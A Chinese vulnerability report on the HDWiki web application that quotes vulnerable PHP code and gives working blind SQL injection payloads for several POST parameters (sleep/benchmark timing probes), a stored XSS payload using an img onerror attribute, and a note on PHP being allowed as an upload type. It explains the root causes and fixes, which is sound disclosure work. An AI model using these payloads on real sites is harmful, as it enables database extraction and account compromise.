### 简要描述:

HDWiki 在经过前面的大牛洗礼之后,变得越来越安全了,小菜我也只能找到几个盲注和 XSS 而已。PS:求别忽略。PSS:漏洞是自己的,rank 是剑心的,所以.....你懂得 ~。~

### 详细说明:

在经过前面的大牛洗礼之后,变得越来越安全了,GET 参数被不分青红皂白地过滤掉一堆关键字,GET 注入几乎是不大可能的了,所以我只找了 POST 参数。

1

```
control/user.php
177 function doaegis(){
178     $id=$this->post['id']; //vulnerable
179     if(empty($id)){
180         $this->message(-1,'',2);
181     }
182     if($_ENV["comment"]->is_in_cookie('aegis',$id)){
183         $this->message(-2,'',2);
184     }
185     $_ENV["comment"]->update_field('aegis',1,$id,0);
186     $this->message($id,'',2);
187 }

model/comment.class.php
56 function update_field($field,$value,$id,$type=1){
57     if($type){
58         $sql="UPDATE ".DB_TABLEPRE."comment SET $field='$value' WHERE id= $id ";
59     }else{
60         $sql="UPDATE ".DB_TABLEPRE."comment SET $field=$field+$value WHERE id= $id ";
61     }
62     $this->db->query($sql);
63 }
```

提交 id=1 and if(substr((select 1),1,1)=1,sleep(10),1) 实现盲注。(根本原因:$id 未经 intval() 或参数绑定就直接拼入 SQL 语句。)

2

```
189 function dooppose(){
190     $id=$this->post['id']; //vulnerable
191     if(empty($id)){
192         $this->message(-1,'',2);
193     }
194     if($_ENV["comment"]->is_in_cookie('oppose',$id)){
195         $this->message(-2,'',2);
196     }
197     $_ENV["comment"]->update_field('oppose',1,$id,0);
198     $this->message($id,'',2);
199 }
```

同上。

3

```
control/gift.php
51 function doapply(){
52     /*获取用户提交参数*/
53     $gid =$this->post['gid']; //礼品id //vulnerable
…..................
61
62     $gift=$_ENV['gift']->get($gid);//当前礼品

model/gift.class.php
46 function get($id){
47     return $this->db->fetch_first("SELECT * FROM ".DB_TABLEPRE."gift WHERE id =".$id);
48 }
```

提交 gid=1 and if(substr((select 1),1,1)=1,benchmark(1000000000,md5(534534)),1) 。

4

```
control/doc.php
1021 function dodelsave(){
1022     $aid=isset($this->get[2])?$this->get[2]:'';
1023     if(empty($aid)){
1024         $aid=$this->post['checkid']; //vulnerable
1025         $num=count($aid);
1026         if($num>0){
1027             $aids='';
1028             for($i=0;$i<$num;$i++){
1029                 $aids.=$aid[$i].',';
1030             }
1031             $aids=substr($aids,0,-1);
1032             $_ENV['doc']->del_autosave($aids);

model/doc.class.php
88 function del_autosave($aid,$uid='',$did=''){
89     if($aid != ''){
90         $sql="DELETE FROM ".DB_TABLEPRE."autosave WHERE aid in ($aid)";
91     }elseif($uid!='' && $did!=''){
92         $sql="DELETE FROM ".DB_TABLEPRE."autosave WHERE uid = '$uid' AND did = '$did'";
93     }else{
94         return false;
95     }
96     return $this->db->query($sql);
97 }
```

checkid[]=1) or if(substr((select 1),1,1)=1,benchmark(1000000000,md5(534534)),1

5

```
control/user.php
166 function doremove(){
167     $messageids = '';
168     if($this->get[2]=='single'){
169         $alltype = array(1,2,3);
170         if(is_numeric($this->post['id']) && in_array($this->post['type'], $alltype)){
171             $_ENV['pms']->update_pms($this->post['id'],$this->post['type']);
172         }
173     }else{
174         $removeid = $this->post['checkid']; //vulnerable
175         $num = count($removeid);
176         $allowlist = array('inbox', 'outbox', 'drafts');
177         if(is_array($removeid) && $num>=1 && in_array($this->get[3], $allowlist)){
178             switch ($this->get[3]){
179                 case inbox:
180                     $type = 1;
181                     break;
182                 case outbox:
183                     $type = 2;
184                     break;
185                 case drafts:
186                     $type = 3;
187                     break;
188             }
189             for($i=0; $i<$num; $i++){
190                 $messageids .= $removeid[$i].',';
191             }
192             $messageids = substr($messageids, 0, -1);
193             $result = $_ENV['pms']->update_pms($messageids, $type);

model/pms.class.php
127 function update_pms($messageids,$type){
128     $id = strpos($messageids , ',') ?
        substr($messageids, 0, strpos($messageids, ',')) : $messageids;
129     $pms = $this->get_pms($id);
130     if($pms['delstatus'] == $type || $type == 3){
131         $result=$this->remove($messageids);
132     }else{
133         $type = ($type == 2) ? 1 : 2;
134         $result=$this->db->query("UPDATE ".DB_TABLEPRE."pms SET delstatus='$type' WHERE id in ($messageids)");
135     }
136     return $result;
137 }

139 function remove($messageids){
140     return($this->db->query("DELETE FROM ".DB_TABLEPRE."pms WHERE id in ($messageids)"));
141 }
```

同上。

XSS

编辑词条时正文过滤不严:在源代码编辑中插入 <img onerror="alert(/yy520/)" src="yy520.jpg" /> ,见 index.php?doc-view-51 。

```
$doc['content'] = string::stripscript($_ENV['doc']->replace_danger_word($this->post['content']));

227 function stripscript($string){
228     $pregfind=array("/<script.*>.*<\/script>/siU",'/on(mousewheel|mouseover|click|load|onload|submit|focus|blur)="[^"]*"/i');
229     $pregreplace=array('','',);
230     $string=preg_replace($pregfind,$pregreplace,$string);
231     return $string;
232 }
```

正文内容先去敏感词,再去关键危险标签,可惜过滤不严:stripscript 只按黑名单匹配列出的几个 on* 事件属性,且要求属性值用双引号,名单之外的事件属性(如 onerror)不会被去掉;修复应改用白名单式的 HTML 净化,而不是继续补黑名单。

上传的一点小问题

./install/install.php:578:('attachment_type', 'jpg|jpeg|bmp|gif|png|gz|bz2|zip|rar|doc|ppt|mp3|xls|txt|swf|flv|php|pdf'),

安装的时候把 php 也加到了可上传文件格式中。默认没开启上传附件,危害也不算大,就是看起来有点不顺眼而已。

### 漏洞证明:

[<img src="https://images.seebug.org/upload/201209/111114522938feaf03463cd35e38c2ffb9cca309.png" alt="" width="600" onerror="javascript:errimg(this);">](https://images.seebug.org/upload/201209/111114522938feaf03463cd35e38c2ffb9cca309.png)